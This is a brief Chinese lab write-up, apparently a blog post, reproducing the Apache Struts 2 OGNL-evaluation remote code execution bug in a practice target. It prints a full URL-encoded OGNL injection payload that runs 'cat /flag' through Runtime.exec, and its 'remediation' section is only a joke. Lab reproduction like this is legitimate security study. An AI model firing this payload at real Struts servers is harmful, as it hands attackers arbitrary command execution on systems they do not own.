一、漏洞情况分析
2.2.3.1 之前的 Apache Struts 2 在处理转换错误期间将字符串评估为 OGNL 表达式,这允许远程攻击者通过对字段的无效输入来修改运行时数据值,从而执行任意代码。
二、漏洞复现

进入靶场

开始复现
name=&email=&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27cat%20%2Fflag%27%29.getInputStream%28%29%29%29+%2B+%27

可以看到相应结果的age框中有flag,至此复现完成
三、漏洞处置建议
把靶场关了,跟漏洞说“白白”
ApacheStruts2漏洞复现与处置:远程代码执行风险

本文分析了ApacheStruts2的一个安全漏洞,攻击者可通过恶意输入执行任意代码。复现步骤详细描述,最后提供漏洞处置建议,包括关闭靶场并防止进一步攻击。
&spm=1001.2101.3001.5002&articleId=135582297&d=1&t=3&u=1f3fd38a1d0e4729851756ebd6bdedcd)
1637





